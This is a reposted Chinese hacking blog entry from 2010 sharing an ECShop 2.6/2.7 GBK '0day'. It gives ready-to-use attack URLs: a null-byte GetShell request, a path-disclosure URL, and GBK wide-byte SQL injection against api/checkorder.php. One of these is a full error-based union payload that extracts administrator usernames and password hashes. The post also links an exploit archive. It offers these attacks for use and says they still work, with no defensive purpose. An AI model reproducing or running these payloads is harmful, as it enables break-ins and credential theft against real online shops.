ecshop 通杀2.6*2.7 GBK版本 oday 爆路径 GetShell

2010, October 4, 6:05 PM. oday收藏
Submitted by admin

转载自:黑小子's Blog http://www.hackersb.com/article.asp?id=254

据说该0day是fjhgx(俺是农村的)大牛发现的。。。

Exp等黑小子发吧。。。或者自己手动也行。。。

以前很早的东西了  刚测试还可以用 至于有一些能不能搞 自行测试  这些东西都可以想起以前的兄弟们 我对这些已经不敢兴趣了 有什么好东西我会陆续放出 工具我会打包!



ecshop 通杀2.6*2.7 GBK版本 附上测试图!
大小: 191.17 K
尺寸: 500 x 354
浏览: 156 次
点击打开新窗口浏览全图大小: 135.02 K
尺寸: 500 x 378
浏览: 132 次
点击打开新窗口浏览全图大小: 109.57 K
尺寸: 500 x 340
浏览: 106 次
点击打开新窗口浏览全图大小: 29.68 K
尺寸: 457 x 254
浏览: 98 次
点击打开新窗口浏览全图大小: 126.66 K
尺寸: 500 x 389
浏览: 144 次
点击打开新窗口浏览全图

(射出编码 0x全部替换)


(替换后的编码)



(lcx的php注射工具 转换编码 From Hex 转换后得到MD5)

大小: 126.66 K
尺寸: 500 x 389
浏览: 110 次
点击打开新窗口浏览全图

ecshop GetShell
http://localhost/ECShop/demo/index.php?a=1111111111%00
爆路径
http://localhost/ECShop/includes\fckeditor\editor\dialog\fck_spellerpages\spellerpages\server-scripts/spellchecker.php

测试
http://localhost/api/checkorder.php?username=%CE%27 or 1=1 %23

 

=============

http://localhost/ecshop/api/checkorder.php?username=%ce%27%20and%201=2%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23

 

附EXP

 

附件: ecshop 通杀2.62.7 gbk版本.rar (2.99 M, 下载次数:1309)

Tags: ecshop

« 上一篇 | 下一篇 »

只显示10条记录相关文章
ecshop最新版 (v272) 本地包含拿SHELL (浏览: 18576, 评论: 0)
ecshop后台获取shell最新方法,通杀最新版本&后台低权限 (浏览: 18170, 评论: 0)
ecshop最新版(v272) 本地包含漏洞ODAY(鸡肋) (浏览: 16094, 评论: 0)
ECshop 支付方式注射 0day (浏览: 14387, 评论: 0)
ecshop v2.72 前台写shell漏洞 (浏览: 12206, 评论: 0)
ecshop2.72鸡肋注入 (浏览: 11152, 评论: 0)
ecshop后台拿shell的又一种方法 (浏览: 13925, 评论: 0)
ecshop SQL注射漏洞0821 0day (浏览: 11167, 评论: 0)
ECSHOP数据库结构参数表结构说明 (浏览: 15221, 评论: 0)
再说两种ecshop后台拿shell的方法 (浏览: 12209, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):